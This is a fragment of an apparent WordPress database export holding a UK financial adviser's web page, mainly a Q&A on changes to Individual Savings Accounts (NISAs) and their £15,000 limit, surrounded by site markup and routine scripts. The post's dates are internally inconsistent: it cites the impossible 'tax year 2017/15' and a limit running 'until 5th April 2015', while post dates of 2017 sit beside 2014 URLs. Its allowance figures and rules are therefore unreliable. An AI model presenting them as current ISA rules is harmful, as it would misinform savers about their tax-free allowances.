onclick=\"javascript:_gaq.push([\'_trackEvent\',\'outbound-widget\',\'http://my.leadpages.net\']);\" target=\"_blank\"><img src=\"../WcBxvj97f6ImTTzlT4h-unuce5ZXpmlrf0JzFKpvBWJyilIlbrxaszuw0Y2NMVq3U1GZSw9_oe6GL-pXCIamWAg_s0.jpg\"/></a><script type=\"text/javascript\" src=\"../leadbox-690.js\"/></div>&#13;\n		</div>	</div>&#13;\n		</div>&#13;\n	</div>&#13;\n				<footer class=\"footer-area\"><div class=\"avada-row\">&#13;\n			<section class=\"columns columns-3\"><article class=\"col\"><div id=\"recent-posts-3\" class=\"footer-widget-col widget_recent_entries\">		<p>Our Latest Posts</p>		<ul><li>&#13;\n				<a href=\"/\">How Your Smartphone Can Improve Your Health</a>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"../5-facts-know-annuities/\">5 Facts You Should Know About Annuities</a>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"../new-individual-savings-accounts-qa/\">The New Individual Savings Accounts — Q&amp;A</a>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"../automatic-enrolment/\">What is Automatic Enrolment</a>&#13;\n						</li>&#13;\n				</ul><div style=\"clear:both;\"/></div>				</article><article class=\"col\"><div id=\"contact_info-widget-2\" class=\"footer-widget-col contact_info\"><p>Contact Info</p>		<div class=\"contact-info-container\">&#13;\n				<p class=\"address\">Manchester &amp; London</p>&#13;\n		&#13;\n				<p class=\"phone\">Phone: </p>&#13;\n		&#13;\n		&#13;\n		&#13;\n				<p class=\"email\">Email: <a href=\"mailto:enquiries@equalitywalk.org.uk\">Click To Email</a></p>&#13;\n		&#13;\n				&#13;\n				</div>&#13;\n		<div style=\"clear:both;\"/></div>				</article><article class=\"col\"><div style=\"clear:both;\"/></article></section></div>				&#13;\n&#13;\n				<article class=\"col last\"/></footer><footer id=\"footer\"/><!-- wrapper --><script type=\"text/javascript\" src=\"../maps/api/js_v_3.exp_amp_sensor_false_amp_language_en.js\"/><!-- W3TC-include-js-head --><script type=\"text/javascript\"><![CDATA[\r\njQuery(window).load(function() {\r\n\r\njQuery( \'#wooslider-id-1\' ).flexslider2({namespace: \"wooslider-\"\r\n, animation: \'fade\', slideshowSpeed: 7000, animationSpeed: 600, slideshow: true, directionNav: true, keyboard: false, mousewheel: false, pausePlay: false, randomize: false, animationLoop: true, pauseOnAction: true, pauseOnHover: false, smoothHeight: false, touch: true, controlNav: true});\r\n\r\n});\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.form.min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar _wpcf7 = {\"loaderUrl\":\"http://www.equalitywalk.org.uk/wp-content/plugins/contact-form-7/images/ajax-loader.gif\",\"sending\":\"Sending ...\",\"cached\":\"1\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/plugins/contact-form-7/includes/js/scripts.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/swfupload.min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar iphormL10n = {\"error_submitting_form\":\"An error occurred submitting the form\",\"swfupload_flash_url\":\"http://www.equalitywalk.org.uk/wp-includes/js/swfupload/swfupload.swf\",\"swfupload_upload_url\":\"http://www.equalitywalk.org.uk/?iphorm_swfupload=1\",\"swfupload_too_many\":\"You have attempted to queue too many files\",\"swfupload_file_too_big\":\"This file exceeds the maximum upload size\",\"swfupload_file_empty\":\"This file is empty\",\"swfupload_file_type_not_allowed\":\"This file type is not allowed\",\"swfupload_unknown_queue_error\":\"Unknown queue error, please try again later\",\"swfupload_upload_error\":\"Upload error\",\"swfupload_upload_failed\":\"Upload failed\",\"swfupload_server_io\":\"Server IO error\",\"swfupload_security_error\":\"Security error\",\"swfupload_limit_exceeded\":\"Upload limit exceeded\",\"swfupload_validation_failed\":\"Validation failed\",\"swfupload_upload_stopped\":\"Upload stopped\",\"swfupload_unknown_upload_error\":\"Unknown upload error\",\"plugin_url\":\"http://www.equalitywalk.org.uk/wp-content/plugins/iphorm-form-builder\",\"preview_no_submit\":\"The form cannot be submitted in the preview\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.iphorm.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.smooth-scroll.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/qtip2/jquery.qtip.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/fancybox/jquery.fancybox-1.3.4.pack.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/uniform/jquery.uniform.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.infieldlabel.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/themes/light/rounded.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/framework/plugins/tf-flexslider/assets/js/jquery.mousewheel.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/framework/plugins/tf-flexslider/assets/js/jquery.flexslider.min.js\"/><script type=\"text/javascript\" src=\"../wp-includes/js/comment-reply.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/modernizr-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.carouFredSel-6.2.1-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.prettyPhoto-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.flexslider-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.fitvids-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/gmap-min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar js_local_vars = {\"dropdown_goto\":\"Go to...\",\"mobile_nav_cart\":\"Shopping Cart\",\"page_smoothHeight\":\"false\",\"flex_smoothHeight\":\"false\",\"language_flag\":\"ICL_LANGUAGE_CODE\",\"infinite_blog_finished_msg\":\"<em>All posts displayed</em>\",\"infinite_blog_text\":\"<em>Loading the next set of posts...</em>\",\"portfolio_loading_text\":\"<em>Loading Portfolio Items...</em>\",\"faqs_loading_text\":\"<em>Loading FAQ Items...</em>\",\"order_actions\":\"Details\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/main.js\"/></body>','&#13;\n	The New Individual Savings Accounts -- Q&amp;A','Read about','publish','closed','closed','','the-new-individual-savings-accounts-qa','','','2017-09-21 16:34:35','2017-09-21 16:34:35','',0,'http://www.equalitywalk.org.uk/the-new-individual-savings-accounts-qa',0,'page','',0),(84,1,'2017-09-21 16:34:35','2017-09-21 16:34:35','<div id=\"wrapper\">\r\n<div id=\"main\" class=\"clearfix \">\r\n<div class=\"avada-row\"><span class=\"entry-title\" style=\"display: none;\">The New Individual Savings Account</span>\r\n<div id=\"post-8425\" class=\"post-8425 post type-post status-publish format-standard has-post-thumbnail hentry category-investments category-wealth-management post\">\r\n<div class=\"post-content\">\r\n\r\n<strong>The New Individual Savings Accounts – Q&amp;A</strong>\r\n\r\n…Or NISAs as we must learn to call them.\r\n\r\nMost of the headlines surrounding George Osborne’s recent Budget focused on the far-reaching changes he made to pensions legislation – the ‘biggest shake-up of pensions for over a hundred years’ as he termed it.\r\n\r\nHowever there are also big changes planned for Individual Savings Accounts, with the rules being revised from July 1st this year.\r\n\r\nWe know that a lot of our clients like to use ISAs for their savings and benefit from the tax advantages: this is likely to increase after July 1st. We therefore thought it might be helpful if we answered all the questions clients have been asking us about the proposed changes to the rules and the introduction of NISAs – New Individual Savings Accounts.\r\n\r\n&nbsp;\r\n<h4>Why has the Chancellor made these changes?</h4>\r\nGeorge Osborne described his Budget as one for ‘the makers, the do-ers and the savers.’ He’s long been concerned that the average person in the UK borrows too much and saves too little and these changes are part of his attempt to address that.\r\n\r\n&nbsp;\r\n\r\n<strong>What’s he proposing?</strong>\r\n\r\nFirstly he’s proposing an increase in the annual ISA limit to £15,000. In the Autumn Statement last year the Chancellor said that the limit for the tax year 2017/15 would be £11,880 but – from July 1st – it will increase to £15,000 and that figure will apply until 5th April 2015, by which time we’ll have had the 2015 Budget speech.\r\n\r\n&nbsp;\r\n\r\nBut I’ve already contributed my £11,880 for this year…\r\n\r\n&nbsp;\r\n\r\nNo problem. From July 1st you’ll be able to contribute an additional £3,120 to bring you up to £15,000. If you have contributed £5,940 into a cash ISA, then you’ll be able to contribute an additional £9,060 from July 1st.\r\n\r\n&nbsp;\r\n\r\nSo a husband and wife can save £30,000 a year in ISAs – or NISAs as we have to call them now?\r\n\r\n&nbsp;\r\n\r\nYes.\r\n\r\n&nbsp;\r\n\r\nWill there still be a limit on what I can put into a cash ISA?\r\n\r\n&nbsp;\r\n\r\nIt used to be the case that up to 50% of the annual allowance could go into a cash ISA but from July 1st that limit disappears. So the only limit will be the overall annual limit.\r\n\r\n&nbsp;\r\n\r\nCan I move my money from stocks and shares ISAs to cash as I get older/more cautious?\r\n\r\n&nbsp;\r\n\r\nYes you can. This is another change that will be welcomed by our clients – previously you couldn’t do this, but from July 1st you will be able to.\r\n\r\n&nbsp;\r\n\r\nWhat about Junior ISAs?\r\n\r\n&nbsp;\r\n\r\nThere’s good news here as well. The limit for Junior ISAs is increasing to £4,000 a year – and remember that if you are aged between 16 and 18 you can hold a cash ISA, but not a stocks and shares ISA.\r\n\r\n&nbsp;\r\n\r\nThis means someone between 16 and 18 can pay the full £15,000 into a cash ISA.\r\n\r\n&nbsp;\r\n\r\nSo all in all this is good news and NISAs will now be much more flexible?\r\n\r\n&nbsp;\r\n\r\nAbsolutely. We think these changes are really good news and we’d expect NISAs to play a significant part in the financial planning of a lot of our clients. Interestingly though, there’ll probably be a need for more financial planning, not less. If say, a husband and wife have £30,000 in cash ISAs – as opposed to £11,880 under the old rules – then it’s going to be even more important that they’re receiving the very best interest rate on that money.\r\n\r\n&nbsp;\r\n\r\nSimilarly if you have £15,000 in a stocks and shares ISA – and potentially a lot more as the investments build up over the years – the performance of your fund manager(s) becomes ever more important. So the changes to the ISA rules will probably mean working more closely with your financial advisers.\r\n\r\n&nbsp;\r\n\r\nAnything else?\r\n\r\n&nbsp;\r\n\r\nOnly that we’ll be encouraging our clients to use these new allowances: as we’ve always stressed, it makes sense to make use of all the tax free allowances that are available to you.\r\n\r\n&nbsp;\r\n\r\nIf you have any other questions on the changes to ISAs – or if you’d like any help on working out exactly what you can contribute in the current tax year – then as always don’t hesitate to contact us. We’re only a phone call or an e-mail away.\r\n\r\n&nbsp;\r\n\r\nWarmest regards\r\n\r\n&nbsp;\r\n\r\nSam\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\">THE VALUE OF INVESTMENTS AND INCOME FROM THEM AND MAY GO DOWN. YOU MAY NOT GET BACK THE ORIGINAL AMOUNT INVESTED</p>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n<div class=\"meta-info\">\r\n\r\n&nbsp;\r\n<div class=\"vcard\">\r\nBy <span class=\"sep\">|</span>Categories: <a title=\"View all posts in Investments\" href=\"../category\" rel=\"category tag\">Investments</a>, <a title=\"View all posts in Wealth Management\" href=\"../category/wealth-management/\" rel=\"category tag\">Wealth Management</a><span class=\"sep\">|</span><span class=\"meta-tags\">Tags: </span><span class=\"sep\">|</span><a title=\"Comment on The New Individual Savings Accounts\" href=\"../new-individual-savings-accounts/\">0 Comments</a></div>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n<div class=\"share-box\">\r\n\r\n&nbsp;\r\n<h4></h4>\r\n&nbsp;\r\n<ul class=\"social-networks social-networks-dark\">\r\n<ul class=\"social-networks social-networks-dark\">\r\n 	<li class=\"facebook\">\r\n<a href=\"http://www.facebook.com/sharer.php?m2w&amp;s=100&amp;p[url]=http://www.equalitywalk.org.uk/new-individual-savings-accounts/&amp;p[title]=The%20New%20Individual%20Savings%20Accounts\" target=\"_blank\">\r\nFacebook\r\n</a>\r\n<div class=\"popup\">\r\n\r\n&nbsp;\r\n<div class=\"holder\">\r\n\r\n&nbsp;\r\n\r\nFacebook\r\n\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;</li>\r\n</ul>\r\n</ul>\r\n&nbsp;\r\n<ul class=\"social-networks social-networks-dark\">\r\n<ul class=\"social-networks social-networks-dark\">\r\n 	<li class=\"twitter\">\r\n<a href=\"http://twitter.com/home?status=The+New+Individual+Savings+Accounts%20http://www.equalitywalk.org.uk/new-individual-savings-accounts/\" target=\"_blank\">\r\nTwitter\r\n</a>\r\n<div class=\"popup\">\r\n\r\n&nbsp;\r\n<div class=\"holder\">\r\n\r\n&nbsp;\r\n\r\nTwitter\r\n\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;</li>\r\n</ul>\r\n</ul>\r\n&nbsp;\r\n<ul class=\"social-networks social-networks-dark\">\r\n<ul class=\"social-networks social-networks-dark\">\r\n 	<li class=\"linkedin\">\r\n<a href=\"http://linkedin.com/shareArticle?mini=true&amp;url=http://www.equalitywalk.org.uk/new-individual-savings-accounts/&amp;title=The%20New%20Individual%20Savings%20Accounts\" target=\"_blank\">\r\nLinkedIn\r\n</a>\r\n<div class=\"popup\">\r\n\r\n&nbsp;\r\n<div class=\"holder\">\r\n\r\n&nbsp;\r\n\r\nLinkedIn\r\n\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;</li>\r\n</ul>\r\n</ul>\r\n&nbsp;\r\n<ul class=\"social-networks social-networks-dark\">\r\n<ul class=\"social-networks social-networks-dark\">\r\n 	<li class=\"reddit\">\r\n<a href=\"http://reddit.com/submit?url=http://www.equalitywalk.org.uk/new-individual-savings-accounts/&amp;title=The%20New%20Individual%20Savings%20Accounts\" target=\"_blank\">\r\nReddit\r\n</a>\r\n<div class=\"popup\">\r\n\r\n&nbsp;\r\n<div class=\"holder\">\r\n\r\n&nbsp;\r\n\r\nReddit\r\n\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;</li>\r\n</ul>\r\n</ul>\r\n&nbsp;\r\n<ul class=\"social-networks social-networks-dark\">\r\n<ul class=\"social-networks social-networks-dark\">\r\n 	<li class=\"tumblr\">\r\n<a href=\"http://www.tumblr.com/share/link?url=http%3A%2F%2Fwww.equalitywalk.org.uk%2Fnew-individual-savings-accounts%2F&amp;name=The+New+Individual+Savings+Accounts&amp;description=We+know+that+a+lot+of+our+clients+like+to+use+ISAs+for+their+savings+and+benefit+from+the+tax+advantages%3A+this+is+likely+to+increase+after+July+1st.+We+therefore+thought+it+might+be+helpful+if+we+answered+all+the+questions+clients+have+been+asking+us+about+the+proposed+changes\" target=\"_blank\">\r\nTumblr\r\n</a>\r\n<div class=\"popup\">\r\n\r\n&nbsp;\r\n<div class=\"holder\">\r\n\r\n&nbsp;\r\n\r\nTumblr\r\n\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;</li>\r\n</ul>\r\n</ul>\r\n&nbsp;\r\n<ul class=\"social-networks social-networks-dark\">\r\n<ul class=\"social-networks social-networks-dark\">\r\n 	<li class=\"google\">\r\n<a href=\"https://plus.google.com/share?url=http://www.equalitywalk.org.uk/new-individual-savings-accounts/\" target=\"_blank\">\r\nGoogle +1\r\n</a>\r\n<div class=\"popup\">\r\n\r\n&nbsp;\r\n<div class=\"holder\">\r\n\r\n&nbsp;\r\n\r\nGoogle +1\r\n\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;</li>\r\n</ul>\r\n</ul>\r\n&nbsp;\r\n<ul class=\"social-networks social-networks-dark\">\r\n<ul class=\"social-networks social-networks-dark\">\r\n 	<li class=\"tf-pinterest\">\r\n<a href=\"#\">\r\nPinterest\r\n</a>\r\n<div class=\"popup\">\r\n\r\n&nbsp;\r\n<div class=\"holder\">\r\n\r\n&nbsp;\r\n\r\nPinterest\r\n\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;</li>\r\n</ul>\r\n</ul>\r\n&nbsp;\r\n<ul class=\"social-networks social-networks-dark\">\r\n<ul class=\"social-networks social-networks-dark\">\r\n 	<li class=\"email\">\r\n<a href=\"mailto:?subject=The New Individual Savings Accounts&amp;body=http://www.equalitywalk.org.uk/new-individual-savings-accounts/\">\r\nEmail\r\n</a>\r\n<div class=\"popup\">\r\n\r\n&nbsp;\r\n<div class=\"holder\">\r\n\r\n&nbsp;\r\n\r\nEmail\r\n\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;</li>\r\n</ul>\r\n</ul>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n<div class=\"about-author\">\r\n\r\n&nbsp;\r\n<div class=\"title\">\r\n<h2>About the Author:</h2>\r\n<div class=\"title-sep-container\"></div>\r\n</div>\r\n&nbsp;\r\n<div class=\"about-author-container\"></div>\r\n&nbsp;\r\n\r\n</div>\r\n<!-- You can start editing here. -->\r\n\r\n\r\n<!-- If comments are open, but there are no comments. -->\r\n<div id=\"respond\" class=\"comment-respond\">\r\n\r\n&nbsp;\r\n<div class=\"title\">\r\n<h2></h2>\r\n<div class=\"title-sep-container\"></div>\r\n</div>\r\n<small><a id=\"cancel-comment-reply-link\" style=\"display: none;\" href=\"../new-individual-savings-accounts/\" rel=\"nofollow\">Cancel reply</a></small>\r\n\r\n<form id=\"commentform\" class=\"comment-form\" action=\"/\" method=\"post\">&nbsp;\r\n<div id=\"comment-input\"><input id=\"author\" class=\"input-name\" tabindex=\"1\" name=\"author\" size=\"22\" type=\"text\" value=\"\" placeholder=\"Name (required)\" /><input id=\"email\" class=\"input-email\" tabindex=\"2\" name=\"email\" size=\"22\" type=\"text\" value=\"\" placeholder=\"Email (required)\" /></div>\r\n&nbsp;\r\n<div id=\"comment-textarea\"></div>\r\n<p class=\"form-submit\">\r\n<input id=\"comment-submit\" name=\"submit\" type=\"submit\" value=\"Post Comment\" /><input id=\"comment_post_ID\" name=\"comment_post_ID\" type=\"hidden\" value=\"8425\" /></p>\r\n&nbsp;\r\n<p style=\"display: none;\"><input id=\"akismet_comment_nonce\" name=\"akismet_comment_nonce\" type=\"hidden\" value=\"62bc530ba8\" /></p>\r\n&nbsp;\r\n<p style=\"display: none;\"><input id=\"ak_js\" name=\"ak_js\" type=\"hidden\" value=\"97\" /></p>\r\n&nbsp;\r\n\r\n</form></div>\r\n<!-- #respond -->\r\n<script type=\"text/javascript\"><![CDATA[ jQuery(document).ready(function () { jQuery(\'#commentform\').submit(function () { _gaq.push( [\'_setAccount\', \'UA-10958181-3\'], [\'_trackEvent\', \'comment\', \'submit\'] ); }); }); ]]></script>\r\n\r\n</div>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n<div id=\"sidebar\" style=\"float: right;\">\r\n\r\n&nbsp;\r\n<div id=\"text-24\" class=\"widget widget_text\">\r\n<div class=\"textwidget\"><center><big><big><big>JOIN OVER 5,000</big></big></big>\r\n\r\nsubscribers who get new content from us on a monthly basis</center>\r\n<a href=\"https://my.leadpages.net/leadbox/1449111f3f72a2%3A125d9572eb46dc/5763711893504000/\" target=\"_blank\"><script type=\"text/javascript\" src=\"../leadbox-694.js\"/></div>\r\n<p>&#13;\r\n		</div>\r\n<div id=\"recent_works-widget-2\" class=\"widget recent_works\">\r\n<div class=\"heading\">\r\n<p>New Guides</p>\r\n</div>\r\n<div class=\"recent-works-items clearfix\">&#13;\r\n										<a href=\"../portfolio-items/smart-money-nov-dec/\" title=\"Smart Money: Nov-Dec\">&#13;\r\n					</a>&#13;\r\n								<a href=\"../portfolio-items/critical-illness-guide/\" title=\"Critical Illness Guide\">&#13;\r\n					</a>&#13;\r\n								<a href=\"../portfolio-items/guide-auto-enrolment/\" title=\"A Guide To Auto Enrolment\">&#13;\r\n					</a>&#13;\r\n				</div>\r\n<p>&#13;\r\n&#13;\r\n		</div>\r\n<div id=\"pyre_tabs-widget-2\" class=\"widget pyre_tabs\">\r\n<div class=\"tab-holder\"><p>&#13;\r\n			</p>\r\n<div class=\"tab-hold tabs-wrapper\"><p>&#13;\r\n				</p>\r\n<ul id=\"tabs\" class=\"tabset tabs\">\r\n<li><a href=\"#tab-popular\">Popular</a></li>\r\n<p>&#13;\r\n															</p>\r\n<li><a href=\"#tab-recent\">Recent</a></li>\r\n<p>&#13;\r\n														</ul>\r\n<div class=\"tab-box tabs-container\"><p>&#13;\r\n										</p>\r\n<div id=\"tab-popular\" class=\"tab tab_content\" style=\"display: none;\"><p>&#13;\r\n												</p>\r\n<ul class=\"news-list\">\r\n<li>&#13;\r\n<br />\r\n<div class=\"image\">&#13;\r\n									<a href=\"../can-i-sell-my-pension-under-55/\">&#13;\r\n																			</a>&#13;\r\n								</div>\r\n<p>&#13;\r\n																</p>\r\n<div class=\"post-holder\"><p>&#13;\r\n									<a href=\"../can-i-sell-my-pension-under-55/\">Can I sell my Pension under 55?</a>&#13;\r\n									</p>\r\n<div class=\"meta\">&#13;\r\n										October 12th, 2017									</div>\r\n<p>&#13;\r\n								</div>\r\n<p>&#13;\r\n							</li>\r\n<p>&#13;\r\n														</p>\r\n<li>&#13;\r\n<br />\r\n<div class=\"image\">&#13;\r\n									<a href=\"../best-annuity-rates/\">&#13;\r\n										<img width=\"52\" height=\"43\" src=\"../wp-content/uploads/2013/02/Lighthouse-symbolism-image-photo1-e1364375976209.jpg\" class=\"attachment-tabs-img wp-post-image\" alt=\"Annuity Rates\"/></a>&#13;\r\n								</div>\r\n<p>&#13;\r\n																</p>\r\n<div class=\"post-holder\"><p>&#13;\r\n									<a href=\"../best-annuity-rates/\">What Are The Best Annuity Rates in The UK</a>&#13;\r\n									</p>\r\n<div class=\"meta\">&#13;\r\n										March 21st, 2017									</div>\r\n<p>&#13;\r\n								</div>\r\n<p>&#13;\r\n							</li>\r\n<p>&#13;\r\n														</p>\r\n<li>&#13;\r\n<br />\r\n<div class=\"post-holder\"><p>&#13;\r\n									<a href=\"/\">The UK’s Income Protection Time Bomb</a>&#13;\r\n									</p>\r\n<div class=\"meta\">&#13;\r\n										September 10th, 2017									</div>\r\n<p>&#13;\r\n								</div>\r\n<p>&#13;\r\n							</li>\r\n<p>&#13;\r\n														</p>\r\n<li>&#13;\r\n<br />\r\n<div class=\"image\">&#13;\r\n									<a href=\"../g-day-impact-gender-directive-insurance/\">&#13;\r\n										<img width=\"52\" height=\"21\" src=\"../wp-content/uploads/2012/09/headline-image-composite-preview.jpg\" class=\"attachment-tabs-img wp-post-image\" alt=\"headline-image-composite-preview\"/></a>&#13;\r\n								</div>\r\n<p>&#13;\r\n																</p>\r\n<div class=\"post-holder\"><p>&#13;\r\n									<a href=\"../g-day-impact-gender-directive-insurance/\">G-day – Impact of the Gender Directive on Insurance</a>&#13;\r\n									</p>\r\n<div class=\"meta\">&#13;\r\n										September 18th, 2017									</div>\r\n<p>&#13;\r\n								</div>\r\n<p>&#13;\r\n							</li>\r\n<p>&#13;\r\n														</p>\r\n<li>&#13;\r\n<br />\r\n<div class=\"image\">&#13;\r\n									<a href=\"../what-does-a-wealth-managerdo/\">&#13;\r\n																			</a>&#13;\r\n								</div>\r\n<p>&#13;\r\n																</p>\r\n<div class=\"post-holder\"><p>&#13;\r\n									<a href=\"../what-does-a-wealth-managerdo/\">What Does a Wealth Manager Do?</a>&#13;\r\n									</p>\r\n<div class=\"meta\">&#13;\r\n										September 5th, 2017									</div>\r\n<p>&#13;\r\n								</div>\r\n<p>&#13;\r\n							</li>\r\n<p>&#13;\r\n													</ul>\r\n</div>\r\n<p>&#13;\r\n															</p>\r\n<div id=\"tab-recent\" class=\"tab tab_content\" style=\"display: none;\"><p>&#13;\r\n												</p>\r\n<ul class=\"news-list\">\r\n<li>&#13;\r\n<br />\r\n<div class=\"image\">&#13;\r\n									<a href=\"../new-individual-savings-accounts/\">&#13;\r\n																			</a>&#13;\r\n								</div>\r\n<p>&#13;\r\n																</p>\r\n<div class=\"post-holder\"><p>&#13;\r\n									<a href=\"../new-individual-savings-accounts/\">The New Individual Savings Accounts</a>&#13;\r\n									</p>\r\n<div class=\"meta\">&#13;\r\n										May 14th, 2017									</div>\r\n<p>&#13;\r\n								</div>\r\n<p>&#13;\r\n							</li>\r\n<p>&#13;\r\n														</p>\r\n<li>&#13;\r\n<br />\r\n<div class=\"image\">&#13;\r\n									<a href=\"../get-auto-enrolment/\">&#13;\r\n																			</a>&#13;\r\n								</div>\r\n<p>&#13;\r\n																</p>\r\n<div class=\"post-holder\"><p>&#13;\r\n									<a href=\"../get-auto-enrolment/\">How To Get The Most From Auto-Enrolment</a>&#13;\r\n									</p>\r\n<div class=\"meta\">&#13;\r\n										May 12th, 2017									</div>\r\n<p>&#13;\r\n								</div>\r\n<p>&#13;\r\n							</li>\r\n<p>&#13;\r\n														</p>\r\n<li>&#13;\r\n<br />\r\n<div class=\"image\">&#13;\r\n									<a href=\"../may-2014-stock-market-bulletin/\">&#13;\r\n																			</a>&#13;\r\n								</div>\r\n<p>&#13;\r\n																</p>\r\n<div class=\"post-holder\"><p>&#13;\r\n									<a href=\"../may-2014-stock-market-bulletin/\">May 2017 Stock Market Bulletin</a>&#13;\r\n									</p>\r\n<div class=\"meta\">&#13;\r\n										May 7th, 2017									</div>\r\n<p>&#13;\r\n								</div>\r\n<p>&#13;\r\n							</li>\r\n<p>&#13;\r\n														</p>\r\n<li>&#13;\r\n<br />\r\n<div class=\"image\">&#13;\r\n									<a href=\"../bank-left-stranded-without-financial-adviser/\">&#13;\r\n																			</a>&#13;\r\n								</div>\r\n<p>&#13;\r\n																</p>\r\n<div class=\"post-holder\"><p>&#13;\r\n									<a href=\"../bank-left-stranded-without-financial-adviser/\">Has Your Bank Left You Stranded Without a Financial Adviser</a>&#13;\r\n									</p>\r\n<div class=\"meta\">&#13;\r\n										April 7th, 2017									</div>\r\n<p>&#13;\r\n								</div>\r\n<p>&#13;\r\n							</li>\r\n<p>&#13;\r\n														</p>\r\n<li>&#13;\r\n<br />\r\n<div class=\"image\">&#13;\r\n									<a href=\"../april-2014-stock-market-bulletin/\">&#13;\r\n																			</a>&#13;\r\n								</div>\r\n<p>&#13;\r\n																</p>\r\n<div class=\"post-holder\"><p>&#13;\r\n									<a href=\"../april-2014-stock-market-bulletin/\">April 2017 Stock Market Bulletin</a>&#13;\r\n									</p>\r\n<div class=\"meta\">&#13;\r\n										April 2nd, 2017									</div>\r\n<p>&#13;\r\n								</div>\r\n<p>&#13;\r\n							</li>\r\n<p>&#13;\r\n													</ul>\r\n</div>\r\n<p>&#13;\r\n														</div>\r\n<p>&#13;\r\n			</div>\r\n<p>&#13;\r\n		</div>\r\n<p>&#13;\r\n		</div>\r\n<div id=\"categories-3\" class=\"widget widget_categories\">\r\n<div class=\"heading\">\r\n<p>Post Categories</p>\r\n</div>\r\n<p><select name=\"cat\" id=\"cat\" class=\"postform\"><option value=\"-1\">Select Category</option><option class=\"level-0\" value=\"13\">Annuities  (1)</option><option class=\"level-0\" value=\"8\">Insurance Protection  (3)</option><option class=\"level-0\" value=\"5\">Investments  (3)</option><option class=\"level-0\" value=\"4\">Pensions  (7)</option><option class=\"level-0\" value=\"6\">Trusts  (1)</option><option class=\"level-0\" value=\"1\">Wealth Management  (16)</option></select><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */ var dropdown = document.getElementById(\"cat\"); function onCatChange() { if ( dropdown.options[dropdown.selectedIndex].value > 0 ) {\r\n			location.href = \"http://www.equalitywalk.org.uk/?cat=\"+dropdown.options[dropdown.selectedIndex].value;\r\n		}\r\n	}\r\n	dropdown.onchange = onCatChange;\r\n/* ]]]]><![CDATA[> */\r\n]]></script></a></div>\r\n<div id=\"social_links-widget-2\" class=\"widget social_links\">\r\n<div class=\"heading\">\r\n\r\nGet Social\r\n\r\n</div>\r\n<ul class=\"social-networks clearfix\">\r\n<ul class=\"social-networks clearfix\">\r\n 	<li class=\"rss\">\r\n<a class=\"rss\" href=\"http://feeds.feedburner.com/Equity SMART\" target=\"_blank\">RSS</a>\r\n<div class=\"popup\">\r\n\r\n&nbsp;\r\n<div class=\"holder\">\r\n\r\n&nbsp;\r\n\r\nRSS\r\n\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;</li>\r\n</ul>\r\n</ul>\r\n&nbsp;\r\n<ul class=\"social-networks clearfix\">\r\n<ul class=\"social-networks clearfix\">\r\n 	<li class=\"twitter\">\r\n<a class=\"twitter\" href=\"https://twitter.com/Invest\" target=\"_blank\">Twitter</a>\r\n<div class=\"popup\">\r\n\r\n&nbsp;\r\n<div class=\"holder\">\r\n\r\n&nbsp;\r\n\r\nTwitter\r\n\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;</li>\r\n</ul>\r\n</ul>\r\n&nbsp;\r\n\r\n</div>\r\n<div id=\"text-23\" class=\"widget widget_text\">\r\n<div class=\"textwidget\"><a href=\"https://my.leadpages.net/leadbox/14392e473f72a2%3A125d9572eb46dc/5699942098141184/\" target=\"_blank\"><img 